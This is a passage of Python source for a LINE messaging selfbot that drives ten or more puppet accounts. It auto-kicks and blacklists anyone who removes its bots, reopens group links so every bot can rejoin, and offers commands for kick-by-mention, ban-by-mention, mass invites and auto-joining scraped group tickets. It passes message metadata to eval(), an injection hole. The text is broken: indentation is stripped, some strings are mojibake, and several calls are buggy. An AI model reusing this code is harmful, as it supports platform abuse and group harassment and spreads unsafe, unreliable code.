if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = True
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = True
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = True
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = True
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Fmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki6.getGroup(op.param1)
G.preventJoinByTicket = True
ki6.updateGroup(G)
Ticket = ki6.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Gmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki7.getGroup(op.param1)
G.preventJoinByTicket = True
ki7.updateGroup(G)
Ticket = ki7.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Hmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki8.getGroup(op.param1)
G.preventJoinByTicket = True
ki8.updateGroup(G)
Ticket = ki8.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Imid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki9.getGroup(op.param1)
G.preventJoinByTicket = True
ki9.updateGroup(G)
Ticket = ki9.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Jmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki10.getGroup(op.param1)
G.preventJoinByTicket = True
ki10.updateGroup(G)
Ticket = ki10.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if op.type == 19:
if op.param3 in Bots:
wait["blacklist"][op.param2] = True
if op.type == 19:
if wait["MProtection"] == True:
if op.param2 not in Bots and op.param2 not in staff:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if op.type == 19:
if op.param3 in admin:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
else:
pass
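# op.type 13: this account was invited to a group; auto-join or auto-cancel below, and pending invites for blacklisted users are cancelled.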
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("\x1e",',') # invitee mids in param3 are 0x1e-separated
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
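# op.type 22/24: room events; leave the room automatically when the leaveRoom flag is on.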
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
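# op.type 26: a message arrived; handles self-sent "join:<gid>:<ticket>" commands, auto-leaving rooms, and auto-liking shared posts.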
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == profile.mid:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
X = cl.getGroup(list_[1])
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
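# op.type 25: a message this account sent; the long elif chain below is the text-command dispatcher.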
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
ki.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
ki.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
ki.sendText(msg.to,"deleted")
#ki.sendText(msg.to,"deleted")
#kk.sendText(msg.to,"deleted")
#kc.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
ki.sendText(msg.to,"It is not in the black list")
#ki.sendText(msg.to,"It is not in the black list")
#kk.sendText(msg.to,"It is not in the black list")
#kc.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
ki.sendText(msg.to,"already")
#ki.sendText(msg.to,"already")
#kk.sendText(msg.to,"already")
#kc.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
ki.sendText(msg.to,"aded")
#ki.sendText(msg.to,"aded")
#kk.sendText(msg.to,"aded")
#kc.sendText(msg.to,"aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
ki.sendText(msg.to,"deleted")
#ki.sendText(msg.to,"deleted")
#kk.sendText(msg.to,"deleted")
#kc.sendText(msg.to,"deleted")
#wait["dblacklist"] = False
else:
wait["dblacklist"] = False
ki.sendText(msg.to,"It is not in the black list")
#ki.sendText(msg.to,"It is not in the black list")
#kk.sendText(msg.to,"It is not in the black list")
#kc.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Key","help","Help"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Set"]:
if msg.from_ in Bots or msg.from_ in staff:
if wait["lang"] == "JP":
cl.sendText(msg.to,Setgroup)
else:
cl.sendText(msg.to,Sett)
elif ("Gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif ("Cv1 gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Cv1 gn ","")
ki.updateGroup(X)
else:
ki.sendText(msg.to,"It can't be used besides the group.")
elif ("Cv2 gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Cv2 gn ","")
kk.updateGroup(X)
else:
kk.sendText(msg.to,"It can't be used besides the group.")
elif ("Cv3 gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Cv3 gn ","")
kc.updateGroup(X)
else:
kc.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
if msg.from_ in Bots or msg.from_ in staff:
midd = msg.text.replace("Kick ","")
ki.kickoutFromGroup(msg.to,[midd])
elif "1 kick " in msg.text:
midd = msg.text.replace("1 kick ","")
ki.kickoutFromGroup(msg.to,[midd])
elif "2 kick " in msg.text:
midd = msg.text.replace("2 kick ","")
ki2.kickoutFromGroup(msg.to,[midd])
elif "3 kick " in msg.text:
midd = msg.text.replace("3 kick ","")
ki3.kickoutFromGroup(msg.to,[midd])
elif "Invite " in msg.text:
if msg.from_ in Bots or msg.from_ in staff:
midd = msg.text.replace("Invite ","")
ki.findAndAddContactsByMid(midd)
ki.inviteIntoGroup(msg.to,[midd])
elif "1 invite " in msg.text:
midd = msg.text.replace("Cv1 invite ","")
ki.findAndAddContactsByMid(midd)
ki.inviteIntoGroup(msg.to,[midd])
elif "2 invite " in msg.text:
midd = msg.text.replace("Cv2 invite ","")
ki2.findAndAddContactsByMid(midd)
ki2.inviteIntoGroup(msg.to,[midd])
elif "3 invite " in msg.text:
midd = msg.text.replace("Cv3 invite ","")
ki3.findAndAddContactsByMid(midd)
ki3.inviteIntoGroup(msg.to,[midd])
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif msg.text in ["1"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
elif msg.text in ["2"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
ki2.sendMessage(msg)
elif msg.text in ["3"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
ki3.sendMessage(msg)
elif msg.text in ["4"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ki4.sendMessage(msg)
elif msg.text in ["5"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
ki5.sendMessage(msg)
elif msg.text in ["6"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Fmid}
ki6.sendMessage(msg)
elif msg.text in ["7"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Gmid}
ki7.sendMessage(msg)
elif msg.text in ["8"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Hmid}
ki8.sendMessage(msg)
elif msg.text in ["9"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Imid}
ki9.sendMessage(msg)
elif msg.text in ["10"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Jmid}
ki10.sendMessage(msg)
elif msg.text in ["Bot"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
ki2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
ki3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ki4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
ki5.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Fmid}
ki6.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Gmid}
ki7.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Hmid}
ki8.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Imid}
ki9.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Jmid}
ki10.sendMessage(msg)
elif msg.text in ["æ„›ã®ãƒ—レゼント","Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
#----- List Group command ------#
elif msg.text in ["List group"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[~]%s\n" % (cl.getGroup(i).name +str (len (cl.getGroup(i).members)))
cl.sendText(msg.to,"========[List Group]========\n"+ h +"Total Group :" +str(len(gid)))
#-----Finish--------#
#------------- Creator command start -----------------#
elif msg.text in ["Creator"]:
if msg.toType == 2:
msg.contentType = 13
Creatorbot = "u9e5a757e7b6e466baf87e8f747d96eb5"
try:
msg.contentMetadata = {'mid': Creatorbot}
except:
Creatorbot = "Error"
cl.sendText(msg.to, "My Creator : IP/nhttp://line.me/ti/p/zuFNPuXyEb")
cl.sendMessage(msg)
#------------- Creator command finish -----------------#
#------------- Kick-by-tag command ---------------------#
elif ("Bye " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
random.choice(KAC).sendText(op.param1, cl.getContact(op.param3).displayName + " ~Sorry (*´・ω・*)")
except:
pass
#------------- Kick-by-tag command finish ---------------------#
#------------- Ban-by-tag command ---------------------#
elif ("BL " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Blacklist")
except:
pass
#------------- Ban-by-tag command finish ---------------------#
elif msg.text in ["cancel","Cancel"]:
if msg.from_ in Bots or msg.from_ in staff:
if msg.toType == 2:
X = ki.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
ki.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"No one is inviting")
else:
ki.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv cancel","Bot cancel"]:
if msg.toType == 2:
G = ki.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
ki.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"No one is inviting")
else:
ki.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["Open","Link on"]:
if msg.from_ in Bots or msg.from_ in staff:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = False
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done")
else:
ki.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["1 open","Cv1 link on"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = False
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done ")
else:
ki.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Close","Link off"]:
if msg.from_ in Bots or msg.from_ in staff:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["1 close","Cv1 link off"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done ")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif "jointicket " in msg.text.lower():
rplace=msg.text.lower().replace("jointicket ")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
elif msg.text == "Ginfo":
if msg.toType == 2:
ginfo = ki.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "close"
else:
u = "open"
ki.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\nmembers:" + str(len(ginfo.members)) + "members\npending:" + sinvitee + "people\nURL:" + u + "it is inside")
else:
ki.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
